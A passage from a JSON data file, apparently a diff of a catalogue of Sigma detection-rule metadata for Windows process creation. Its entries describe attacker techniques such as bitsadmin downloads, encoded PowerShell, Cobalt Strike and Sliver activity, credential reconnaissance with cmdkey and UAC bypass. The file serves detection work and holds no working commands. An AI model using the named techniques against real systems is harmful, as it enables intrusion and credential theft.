network, an adversary may use automated techniques for collecting internal data.", - "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1", - "value": "Automated Collection Command Prompt", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_automated_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119", - "attack.credential_access", - "attack.t1552.001" - ], - "creation_date": "2021/07/28", - "filename": "proc_creation_win_automated_collection.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.", - "uuid": "a7c3d773-caef-227e-a7e7-c2f13c622329", - "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "meta": { - "refs": [ - "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", - "https://www.cobaltstrike.com/help-opsec", - "https://twitter.com/CyberRaiju/status/1251492025678983169", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2020/10/23", - "filename": "proc_creation_win_bad_opsec_sacrificial_processes.yml", - 
"author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets", - "uuid": "fd6e2919-3936-40c9-99db-0aa922c356f7", - "value": "Malicious Base64 Encoded Powershell Invoke Cmdlets", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/05/31", - "filename": "proc_creation_win_base64_invoke_susp_cmdlets.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects base64 encoded listing Win32_Shadowcopy", - "uuid": "47688f1b-9f51-4656-b013-3cc49a166a36", - "value": "Base64 Encoded Listing of Shadowcopy", - "meta": { - "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_listing_shadowcopy.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/03/01", - "filename": "proc_creation_win_base64_listing_shadowcopy.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "uuid": 
"62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "value": "Base64 Encoded Reflective Assembly Load", - "meta": { - "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027", - "attack.t1620" - ], - "creation_date": "2022/03/01", - "filename": "proc_creation_win_base64_reflective_assembly_load.yml", - "author": "Christian Burkard, pH-T", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of bitsadmin downloading a file", - "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", - "value": "Bitsadmin Download", - "meta": { - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ], - "creation_date": "2017/03/09", - "filename": "proc_creation_win_bitsadmin_download.yml", - "author": "Michael Haag, FPT.EagleEye", - "level": "medium", - "falsepositive": [ - "Some legitimate apps use this, but limited." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "value": "Bitsadmin Download from Suspicious Domain", - "meta": { - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_bitsadmin_download_susp_domain.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Some legitimate apps use this, but limited." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", - "value": "Bitsadmin Download File with Suspicious Extension", - "meta": { - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_bitsadmin_download_susp_ext.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", - "uuid": "99c840f2-2012-46fd-9141-c761987550ef", - "value": "Bitsadmin Download File from IP", - "meta": { - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_bitsadmin_download_susp_ip.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of 
bitsadmin downloading a file to a suspicious target folder", - "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "value": "Bitsadmin Download to Suspicious Target Folder", - "meta": { - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", - "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", - "value": "Bitsadmin Download to Uncommon Target Folder", - "meta": { - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies use of the bcdedit command to delete boot configuration data. 
This tactic is sometimes used as by malware or an attacker as a destructive technique.", - "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "value": "Modification of Boot Configuration", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", - "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_bootconf_mod.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects browsers starting with the remote debugging flags. 
Which is a technique often used to perform browser injection attacks", - "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", - "value": "Browser Started with Remote Debugging", - "meta": { - "refs": [ - "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", - "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1185" - ], - "creation_date": "2022/07/27", - "filename": "proc_creation_win_browser_remote_debugging.yml", - "author": "pH-T, Nasreddine Bencherchali (update)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash", - "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea", - "value": "SquiblyTwo Execution", - "meta": { - "refs": [ - "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", - "https://twitter.com/mattifestation/status/986280382042595328", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1047", - "attack.t1220", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_bypass_squiblytwo.yml", - "author": "Markus Neis, Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "uuid": "42333b2c-b425-441c-b70e-99404a17170f", - "value": "Sliver C2 Implant Activity Pattern", - "meta": { - "refs": [ - 
"https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36", - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c2_sliver.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/08/25", - "filename": "proc_creation_win_c2_sliver.yml", - "author": "Nasreddine Bencherchali, Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "uuid": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", - "value": "F-Secure C3 Load by Rundll32", - "meta": { - "refs": [ - "https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c3_load_by_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2021/06/02", - "filename": "proc_creation_win_c3_load_by_rundll32.yml", - "author": "Alfie Champion (ajpc500)", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", - "uuid": "242301bc-f92f-4476-8718-78004a6efd9f", - "value": "Suspicious Load DLL via CertOC.exe", - "meta": { - "refs": [ - "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", - 
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", - "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/10/23", - "filename": "proc_creation_win_certoc_execution.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", - "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916", - "value": "NTLM Coercion Via Certutil.exe", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/issues/243", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/09/01", - "filename": "proc_creation_win_certutil_ntlm_coercion.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. 
Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", - "uuid": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", - "value": "Change Default File Association", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_association.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.001" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_change_default_file_association.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "low", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a program changes the default file association of any extension to an executable", - "uuid": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "value": "Change Default File Association To Executable", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.001" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_change_default_file_assoc_susp.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", - "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5", - "value": "Chisel Tunneling Tool Usage", - "meta": { - "refs": [ - "https://github.com/jpillora/chisel/", - 
"https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.001" - ], - "creation_date": "2022/09/13", - "filename": "proc_creation_win_chisel_usage.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Some false positives may occure with other tools with similar commandlines" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e", - "value": "Powershell ChromeLoader Browser Hijacker", - "meta": { - "refs": [ - "https://redcanary.com/blog/chromeloader/", - "https://emkc.org/s/RJjuLa", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1176" - ], - "creation_date": "2022/06/19", - "filename": "proc_creation_win_chrome_load_extension.yml", - "author": "Aedan Russell, frack113 (sigma)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "uuid": "f44800ac-38ec-471f-936e-3fa7d9c53100", - "value": "CleanWipe Usage", - "meta": { - "refs": [ - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cleanwipe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/12/18", - "filename": 
"proc_creation_win_cleanwipe.yml", - "author": "Nasreddine Bencherchali @nas_bench", - "level": "high", - "falsepositive": [ - "Legitimate administrative use (Should be investigated either way)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications.", - "uuid": "ddeff553-5233-4ae9-bbab-d64d2bd634be", - "value": "Use of CLIP", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ], - "creation_date": "2021/07/27", - "filename": "proc_creation_win_clip.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of cmdkey to look for cached credentials", - "uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53", - "value": "Cmdkey Cached Credentials Recon", - "meta": { - "refs": [ - "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", - "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.005" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_cmdkey_recon.yml", - "author": "jmallette, Florian Roth, Nasreddine Bencherchali (update)", - "level": "high", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Adversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", - "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3", - "value": "Windows Cmd Delete File", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2022/01/15", - "filename": "proc_creation_win_cmd_delete.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible payload obfuscation via the commandline", - "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51", - "value": "Suspicious Dosfuscation Character in Commandline", - "meta": { - "refs": [ - "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/02/15", - "filename": "proc_creation_win_cmd_dosfuscation.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of \"/R <\" to read and execute a file via cmd.exe", - "uuid": 
"00a4bacd-6db4-46d5-9258-a7d5ebff4003", - "value": "Read and Execute a File Via Cmd.exe", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_read_contents.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2022/08/20", - "filename": "proc_creation_win_cmd_read_contents.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Use \">\" to redicrect information in commandline", - "uuid": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", - "value": "Redirect Output in CommandLine", - "meta": { - "refs": [ - "https://ss64.com/nt/syntax-redirection.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirect.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2022/01/22", - "filename": "proc_creation_win_cmd_redirect.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", - "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", - "value": "Suspicious CMD Shell Redirect", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/07/12", - "filename": "proc_creation_win_cmd_redirection_susp_folder.yml", - "author": "Nasreddine 
Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate admin scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "value": "CMSTP UAC Bypass via COM Object Access", - "meta": { - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://twitter.com/hFireF0X/status/897640081053364225", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" - ], - "creation_date": "2019/07/31", - "filename": "proc_creation_win_cmstp_com_object_access.yml", - "author": "Nik Seetharaman, Christian Burkard", - "level": "high", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "value": "CMSTP Execution Process Creation", - "meta": { - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml" - ], - "tags": [ - 
"attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" - ], - "creation_date": "2018/07/16", - "filename": "proc_creation_win_cmstp_execution_by_creation.yml", - "author": "Nik Seetharaman", - "level": "high", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "value": "Operator Bloopers Cobalt Strike Commands", - "meta": { - "refs": [ - "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", - "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", - "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2022/05/06", - "filename": "proc_creation_win_cobaltstrike_bloopers_cmd.yml", - "author": "_pete_0, TheDFIRReport", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of Cobalt Strike module commands accidentally entered in the CMD shell", - "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "value": "Operator Bloopers Cobalt Strike Modules", - "meta": { - "refs": [ - "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", - "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", - "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2022/05/06", - "filename": "proc_creation_win_cobaltstrike_bloopers_modules.yml", - "author": "_pete_0, TheDFIRReport", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", - "value": "CobaltStrike Load by Rundll32", - "meta": { - "refs": [ - "https://www.cobaltstrike.com/help-windows-executable", - "https://redcanary.com/threat-detection-report/", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2021/06/01", - "filename": 